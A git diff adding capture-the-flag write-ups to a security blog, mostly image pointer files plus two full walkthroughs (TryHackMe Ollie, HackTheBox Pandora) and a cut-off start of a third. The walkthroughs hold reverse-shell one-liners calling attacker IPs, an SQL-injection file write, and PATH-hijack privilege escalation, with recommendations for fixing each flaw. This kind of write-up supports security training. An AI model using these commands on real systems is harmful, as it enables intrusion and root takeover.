https://git-lfs.github.com/spec/v1 +oid sha256:ff3094bfc6bed3f697e6adbe2b5817604204d8dbedbba61bfea96dc816d88d43 +size 176986 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-4.png b/content/writeup-ctf/writeup-ollie-thm/img/image-4.png new file mode 100644 index 0000000..7be34e8 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0006fe079492d34a80be44c20c27a7d9ddf0dcf1074cdd56dc283e0c8a83ee8e +size 339613 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-4.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-4.webp new file mode 100644 index 0000000..de06ad9 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3656ef1e6bf62dd96ddcfd9aa6d52c153cc626badfa5bb6576f1dc7c943e0865 +size 46320 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-5.png b/content/writeup-ctf/writeup-ollie-thm/img/image-5.png new file mode 100644 index 0000000..7c5247a --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a94c3fbbbbf653d7768c5dd9f48fd1c2bf250c080f39c4b47486030cb263c79 +size 175016 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-5.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-5.webp new file mode 100644 index 0000000..d7a36f4 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fce647e8dfcd84db18ec204ef95cebcb7dfd8d5516ce6cf219c4d4fe187a30e4 +size 176006 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-6.png b/content/writeup-ctf/writeup-ollie-thm/img/image-6.png new file mode 100644 index 0000000..13ecdef --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94ca7c8d669b7ebfecbdd5889de6f7767abdb2db5a58e59ac6c464ce901f37e4 +size 28760 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-6.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-6.webp new file mode 100644 index 0000000..6c71468 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7546cb116d018ea951ba2eedee3c370d36d319b94814ec7c7862c4e104a031c0 +size 24368 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-7.png b/content/writeup-ctf/writeup-ollie-thm/img/image-7.png new file mode 100644 index 0000000..a2cca07 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e98bf0d68a76bf67c498ef6770447adc50eeb97b06c38182801bd409896dae7 +size 10389 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-7.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-7.webp new file mode 100644 index 0000000..b9d858e --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6778a7bb09055c83bc98b55677c816b3971d220625bd16fb09ba13ddc3767290 +size 9872 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-8.png b/content/writeup-ctf/writeup-ollie-thm/img/image-8.png new file mode 100644 index 0000000..c957b40 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b6b4a8a33f3605ef81635d52ed3532679a8d6c3935098d147b27fd4545255f0 +size 11042 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-8.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-8.webp new file mode 100644 index 0000000..53733c4 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec1967348cec7cb392937eb0f26b480f309d43ba9ba5ff023d9edf1c3b0fd242 +size 14112 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-9.png b/content/writeup-ctf/writeup-ollie-thm/img/image-9.png new file mode 100644 index 0000000..ba59a68 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:72eb60d5aba874e9bb66afce2f07f825710b5c7954c281a6ae32c71a583a4d20 +size 19720 diff --git a/content/writeup-ctf/writeup-ollie-thm/img/image-9.webp b/content/writeup-ctf/writeup-ollie-thm/img/image-9.webp new file mode 100644 index 0000000..06d8dbc --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e75786cfbe23d79383e55073ea396e2d92ae527ce55b2e66d78f40f54e47ae16 +size 19686 diff --git a/content/writeup-ctf/writeup-ollie-thm/index.md b/content/writeup-ctf/writeup-ollie-thm/index.md new file mode 100644 index 0000000..27d9221 --- /dev/null +++ b/content/writeup-ctf/writeup-ollie-thm/index.md @@ -0,0 +1,159 @@ +--- +title: "Writeup - Ollie (THM)" +date: 2022-04-22 +slug: "writeup-ollie-thm" +type: "writeup-ctf" +--- + +This is a writeup for the [Ollie](https://tryhackme.com/room/ollie) machine from the TryHackMe site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV -T4 -Pn 10.10.147.194 +``` +Three TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : HTTP web server (Apache 2.4.41) +- 1337/tcp : Chat and file  sharing (waste) + +![](img/image-2.webp) + +## Exploit + +First of all I connect via netcat to the waste port to see if I can get some information. + + +```bash +┌──(d3vyce㉿kali)-[~/Documents] +└─$ nc 10.10.147.194 1337 +Hey stranger, I'm Ollie, protector of panels, lover of deer antlers. + +What is your name? azerty +What's up, Azerty! It's been a while. What are you here for? test +Ya' know what? Azerty. If you can answer a question about me, I might have something for you. + + +What breed of dog am I? I'll make it a multiple choice question to keep it easy: Bulldog, Husky, Duck or Wolf? Bulldog +You are correct! Let me confer with my trusted colleagues; Benny, Baxter and Connie... +Please hold on a minute +Ok, I'm back. +After a lengthy discussion, we've come to the conclusion that you are the right person for the job.Here are the credentials for our administration panel. + + Username: admin + + Password: OllieUnixMontgomery! + +PS: Good luck and next time bring some treats! + +``` +After some tests, I find that the chat returns credencials for an admin panel. If I go to the port 80 site, I find a login page, so I test the credencials and it works! + +![](img/image-3.webp) + +This is an administration page based on `phpIPAM 1.4` after some research I find the following exploit : [exploit](https://fluidattacks.com/advisories/mercury/). I try to apply it to see if it works. + +![](img/image-4.webp) + +After following the different steps, the exploit works, so we can now perform SQL injections! To automate the upload process of a php reverse shell I will use `sqlmap`. I start by extracting a query with Burp : + + +```bash +POST /app/admin/routing/edit-bgp-mapping-search.php HTTP/1.1 +Host: 10.10.196.154 +Content-Length: 20 +Accept: */* +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Sa> +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://10.10.196.154 +Referer: http://10.10.196.154/index.php?page=tools§ion=routing&subnetId=bgp&sPage=2 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: phpipamredirect=%2Findex.php%3Fpage%3Dtools%26section%3Drouting%26subnetId%3Dbgp%26sPage%3D2; phpipam=151l3> +Connection: close + +subnet=test&bgp_id=2 +``` +Then with the following command I send my php file : + + +```bash +sqlmap -r request.txt --file-write=reverse.php --file-dest=/var/www/html/reverse.php --batch +``` +![](img/image-5.webp) + +After running netcat I can access the file and create a reverse shell. + +![](img/image-6.webp) + +After some research I find that a user folder: `ollie`. So I try to change the user with the password I found before: + +![](img/image-7.webp) + +I can now recover the first flag. + + +```bash +ollie@hackerdog:~$ cat user.txt +cat user.txt +THM{Ollie_boi_is_daH_Cut3st} +``` +## Privilege escalation + +I start by running [linpeas.sh](https://linpeas.sh) but I don't find anything interesting. So I try to list the services with [pspy64](https://github.com/DominicBreuker/pspy). + + +```bash +ollie@hackerdog:~$ ./pspy64 +./pspy64 +pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855 + + + ██▓███ ██████ ██▓███ ▓██ ██▓ + ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒ + ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░ + ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░ + ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░ + ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ + ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ + ░░ ░ ░ ░ ░░ ▒ ▒ ░░ + ░ ░ ░ + ░ ░ + +Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive) +Draining file system events due to startup... +done +[...] +2022/04/13 10:11:43 CMD: UID=0 PID=1355 | python3 -u olliebot.py +[...] +2022/04/13 10:12:04 CMD: UID=0 PID=37813 | /bin/bash /usr/bin/feedme +[...] +``` +In the result of the command I see 2 interesting services executed by the UID=0 i.e. root. The second one is a bash script but without any particular content. But I have write permission. + +![](img/image-8.webp) + +So I add a reverse shell in the file with the following command: + + +```bash +echo "/bin/bash -i >& /dev/tcp/10.8.3.186/2345 0>&1" >> /usr/bin/feedme +``` +Then after a few seconds, I have a reverse shell root and I can recover the last flag. + +![](img/image-9.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not put credentials in a public chat +- Do not use the same password for a session and a web service +- Do not allow scripts executed by root to be writable by other users diff --git a/content/writeup-ctf/writeup-pandora-htb/featured.png b/content/writeup-ctf/writeup-pandora-htb/featured.png new file mode 100644 index 0000000..65151e1 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3896e27352033280100dbdaedc10fcea42f1a31a1c5ae3800964e92a7d522f0f +size 278361 diff --git a/content/writeup-ctf/writeup-pandora-htb/featured.webp b/content/writeup-ctf/writeup-pandora-htb/featured.webp new file mode 100644 index 0000000..ed75896 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:90bc42a8d6b64b982b879cb8d8bc687f0143df2610e1f60731752cf9bf6b75c7 +size 27134 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-1.png b/content/writeup-ctf/writeup-pandora-htb/img/image-1.png new file mode 100644 index 0000000..4b532b3 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9ad28dc81c668f635dcd23a36563670ff499f77e0e5416d13ebde7df480becc8 +size 52933 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-1.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-1.webp new file mode 100644 index 0000000..d385839 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1d6359acfe320430a98508df03316cd083f0697a610c3ca78e99482779d61866 +size 50354 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-10.png b/content/writeup-ctf/writeup-pandora-htb/img/image-10.png new file mode 100644 index 0000000..fdb9cf1 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2158090d6e417aad45b07e63622456db610a47c2e58e299e7382cf3937ff081e +size 22128 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-10.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-10.webp new file mode 100644 index 0000000..6dd841a --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:860a66b29134bf125aa27a8373647def07d6c2d0409c1ce737397337c992800f +size 21376 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-11.png b/content/writeup-ctf/writeup-pandora-htb/img/image-11.png new file mode 100644 index 0000000..600695c --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7c02edc247a4adbd15f6e98f26cd874f695cbd2dce229a7c624085e5c73084df +size 14133 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-11.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-11.webp new file mode 100644 index 0000000..fe720d0 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:71c9abdb537d5872adcca73056445a0ef5af125a39f04d04f6f83297107b3f90 +size 14282 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-2.png b/content/writeup-ctf/writeup-pandora-htb/img/image-2.png new file mode 100644 index 0000000..b8870bf --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:95a78c77d0be28aa868c2db45b5f72bfec127432ef6fd642adfa75df541fe301 +size 7799 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-2.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-2.webp new file mode 100644 index 0000000..292d03e --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e9c9f78705cf78b7f888f3a1afe93a5e78049c8f6dec9afacfd65777e07d553 +size 8626 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-3.png b/content/writeup-ctf/writeup-pandora-htb/img/image-3.png new file mode 100644 index 0000000..8da395a --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d2d8e595183115f1eea997f3d84f00e6b936bd37e30e3d71b9bf4b3dc2c8e5e5 +size 61354 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-3.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-3.webp new file mode 100644 index 0000000..4cc7139 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2fcf00c893eea9a82351a6a5a33985ae9de2b4232160b0107c1377a6f2a3f411 +size 52110 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-4.png b/content/writeup-ctf/writeup-pandora-htb/img/image-4.png new file mode 100644 index 0000000..2d63b92 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c49b39eff68e54203094258b6488adf59f093e2c846743c2a38d57e53b9a89d0 +size 109159 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-4.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-4.webp new file mode 100644 index 0000000..4eeb0b1 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6120c24b0a5b7b4ec6529e1df0f204582ebe8f9f9d9139d6a7a64d50ed2e005f +size 101174 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-5.png b/content/writeup-ctf/writeup-pandora-htb/img/image-5.png new file mode 100644 index 0000000..cf65233 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8dcfc3fd6f0c9474c00ef9ae02bded796c996bc31f9e7f4417dbe99eca26a3e +size 44176 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-5.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-5.webp new file mode 100644 index 0000000..729f63f --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5294b47c545b951d6d9494b34c6fceff04c67af75f55a56c1e85024151f3d968 +size 34726 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-6.png b/content/writeup-ctf/writeup-pandora-htb/img/image-6.png new file mode 100644 index 0000000..fdc8efc --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af47c01bf4985201766f2f5a2d5d75080a1e5ef0db4a90d00502afe69560e18c +size 791135 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-6.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-6.webp new file mode 100644 index 0000000..b514e98 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:facc4dc10ad098bee58ef5baceb933b43adebe9d3bfa7ccd87a7be0ca4bcb0cb +size 107802 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-7.png b/content/writeup-ctf/writeup-pandora-htb/img/image-7.png new file mode 100644 index 0000000..6e2bf37 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6878c0969b5722a1762dad207b6b0d1bf00b78d8df6450ffe71f8eab0f0f00d9 +size 40049 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-7.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-7.webp new file mode 100644 index 0000000..0c5f4d6 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:eb0e71d67788ef3d3c4024bbd35b54e9c6a7b2e2c08ed51b06848c620eea216b +size 33010 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-8.png b/content/writeup-ctf/writeup-pandora-htb/img/image-8.png new file mode 100644 index 0000000..bc03c99 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c8e5e32898c0a9eac34267adf5a404d69fb5c3472fa5e81cda6bb85c73aaf281 +size 28511 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-8.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-8.webp new file mode 100644 index 0000000..446e50f --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bd980bff7a5970ee308ffb742a2497f3c9f25354f5d8d48a9a274344104c4dd1 +size 28604 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-9.png b/content/writeup-ctf/writeup-pandora-htb/img/image-9.png new file mode 100644 index 0000000..657bf93 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a6d5299989c77099dbd9deb56714d829ae86b7679a7987c1e4053ad46f1a00b9 +size 54089 diff --git a/content/writeup-ctf/writeup-pandora-htb/img/image-9.webp b/content/writeup-ctf/writeup-pandora-htb/img/image-9.webp new file mode 100644 index 0000000..6e15616 --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5ec854af17d172738fb5c862e93836159affb78295e0665d3df0fc97f233d05a +size 43834 diff --git a/content/writeup-ctf/writeup-pandora-htb/index.md b/content/writeup-ctf/writeup-pandora-htb/index.md new file mode 100644 index 0000000..e8fb09c --- /dev/null +++ b/content/writeup-ctf/writeup-pandora-htb/index.md @@ -0,0 +1,162 @@ +--- +title: "Writeup - Pandora (HTB)" +date: 2022-04-12 +slug: "writeup-pandora-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Pandora](https://app.hackthebox.com/machines/Pandora) machine from the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.136 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +In addition to these two ports, a UDP scan reveals a third port: + + +```bash +sudo nmap -sU 10.10.11.136 +``` +![](img/image-2.webp) + +So we discovered 3 open ports, the two TCP ports are quite common (SSH and HTTP) they are services often open to the outside. But the SNMP port is not common. It is generally a service that stays in the local network and is not intended to be accessible from outside. + +- 22/tcp : SSH port (OpenSSH 8.2p1) +- 80/tcp : web server (Apache 2.4.41) +- 161/udp : snmp server (SNMPv1) + +So I will start by looking for exploits related to the SNMP port. + +## Exploit + +After some research in Metasploit modules, I find "auxiliary/scanner/snmp/snmp\_enum". This module allows to get via SNMP a lot of information about our target. + +We find for example the open ports on the target PC: + +![](img/image-3.webp) + +A little further down we find the list of services that run on the machine, and in this list we find the following service: + + +```bash +829 runnable sh /bin/sh -c sleep 30; +/bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23' +``` +This service, although ordinary, has two very interesting attributes: -u and -p. A User and a Password ! Being a user of our target machine it is possible that we could connect via SSH with these credentials... BINGO, we are connected! + +![](img/image-4.webp) + +After some research, I find a file "user.txt" in the user folder of "matt". But I don't have the permission. I will have to find a way to change the user. + +To start I scan the machine for potential exploit with the [linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script. + +To do this after hosting the script on a web server with the command: + + +```bash +sudo python3 -m http.server 81 +``` +I can then wget the file and add the execution rights: + +![](img/image-5.webp) + +After some research in the script result, I notice that a page "pandora\_console" is hosted on a site accessible only by local users. + +To access it remotely, I will do an SSH port forwarding with the following command: + + +```bash +ssh -L 8082:127.0.0.1:80 -N daniel@10.10.11.136 +``` +We can now access the site with the following address "127.0.0.1:8082/pandora\_console/" we arrive on the following site: + +![](img/image-6.webp) + +After some research I find the Pandora exploit [CVE-2021-32099](https://blog.sonarsource.com/pandora-fms-742-critical-code-vulnerabilities-explained/) and more particularly the following script which allows via the admin session cookie the creation of a shell. + +[GitHub - shyam0904a/Pandora\_v7.0NG.742\_exploit\_unauthenticated: Unauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shellUnauthenticated Sqlinjection that leads to dump data base but this one impersonated Admin and drops a interactive shell - GitHub - shyam0904a/Pandora\_v7.0NG.742\_exploit\_unauthenticated: Unauthentic...![](https://github.com/fluidicon.png) + +{{< github repo="shyam0904a/Pandora_v7.0NG.742_exploit_unauthenticated" >}} + +After executing the script, we can retrieve the first flag which is the matt flag: + +![](img/image-7.webp) + + +```bash +CMD > cat /home/matt/user.txt +285476d908ea2c455c35d028d52969b3 +``` +Now I will try to create a reverse shell a little better to do the privilege elevation. For that I test a number of commands from this [github](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md). After about ten tests, I finally find one that works: + + +```bash +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"10.10.14.246:1234");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' +``` +I do a shell upgrade with the following command: + + +```bash +python3 -c 'import pty;pty.spawn("/bin/bash")' +``` +I now have a clean shell with the user matt. + +![](img/image-8.webp) + +## Privilege escalation + +For the elevation of privilege I re-run the [linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) script and look for vulnerabilities to explore. The first one I found is the CVE-2021-4034 which allows the switch in root. No luck the host does not have gcc. I'll look for something else... + +I then list the commands that can be executed by everyone but that run with high privilege: + + +```bash +find / -perm -u=s -type f 2>/dev/null +``` +![](img/image-9.webp) + +I then search for matches on the [GTFOBins](https://gtfobins.github.io) site and find an interesting exploit allowing to remove the restrict shell with the command "at": + + +```bash +echo "/bin/sh <$(tty) >$(tty) 2>$(tty)" | at now; tail -f /dev/null +``` +![](img/image-10.webp) + +I will now be able to use the sudo command, but I don't have matt's password, I have to find another lever to get root. A second command that seemed interesting was: "pandora\_backup". Indeed a custom script and therefore with potential flaws. After downloading it locally, I extract the strings to try to see if I can recover some information from the : + + +```bash +strings pandora_backup +``` +We notice that the tar command is used to compress files in the root folder.  But the call to tar does not use the full path, so we will be able to change the $PATH for a custom executable allowing us a privilege elevation. + +For that I create a "tar" file in the "tmp" folder, then I put the command /bin/sh inside. After adding the permissions on the file I can run the script : + + +```bash +cd /tmp && echo "/bin/sh" > tar && chmod 777 tar +export PATH=/tmp:$PATH +pandora_backup +``` +We now have a root shell and we can retrieve the last flag in the root folder: + +![](img/image-11.webp) + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Do not leave the SNMP port open to the outside +- Use SNMPv3 which is much more secure +- Update Pendora: the problem is patched in the latest version +- Do not use login/password in program execution commands +- Use public/private keys for SSH authentication diff --git a/content/writeup-ctf/writeup-paper-htb/featured.png b/content/writeup-ctf/writeup-paper-htb/featured.png new file mode 100644 index 0000000..318f61d --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0a6bb3a6471067523948b8a426f04f40aff1fba096d60e17119f99dc574b5bc1 +size 290842 diff --git a/content/writeup-ctf/writeup-paper-htb/featured.webp b/content/writeup-ctf/writeup-paper-htb/featured.webp new file mode 100644 index 0000000..e501ff9 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e1ff11b4e4b60cea6dd70610fc839cb27626fa2c5b87892edd231b0b0fbcb981 +size 27460 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-1.png b/content/writeup-ctf/writeup-paper-htb/img/image-1.png new file mode 100644 index 0000000..19150e2 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:644217a205d8274dc11bfede3dab1c49e7e4c4e3709e951515cdbe4f04a547a9 +size 54869 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-1.webp b/content/writeup-ctf/writeup-paper-htb/img/image-1.webp new file mode 100644 index 0000000..3131c0b --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:03e0069fa122527199f97fba8cdefd299dee126651cb4bbf01f189b82a970e45 +size 49232 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-10.png b/content/writeup-ctf/writeup-paper-htb/img/image-10.png new file mode 100644 index 0000000..2d3b26f --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2e581318e51a40e60e1cdb2037d67cab0382408f32b8286699529d2dbf464c53 +size 41840 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-10.webp b/content/writeup-ctf/writeup-paper-htb/img/image-10.webp new file mode 100644 index 0000000..f759bdd --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ef50d8b7faf37f21accb0c6cfdb16bef3b6c90fec75a41615d164a2aec9edb5b +size 33284 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-11.png b/content/writeup-ctf/writeup-paper-htb/img/image-11.png new file mode 100644 index 0000000..bbe3f13 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e7aa536741003fec1e2242f8d42d77309db5925861b4449b53efb7c52ee8696b +size 16667 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-11.webp b/content/writeup-ctf/writeup-paper-htb/img/image-11.webp new file mode 100644 index 0000000..998386f --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8ac9b032f2bb3afb7d6067a9c68d4efac3f7d849992bc736088778614954863 +size 15314 diff --git a/content/writeup-ctf/writeup-paper-htb/img/image-12.png b/content/writeup-ctf/writeup-paper-htb/img/image-12.png new file mode 100644 index 0000000..1afc825 --- /dev/null +++ b/content/writeup-ctf/writeup-paper-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 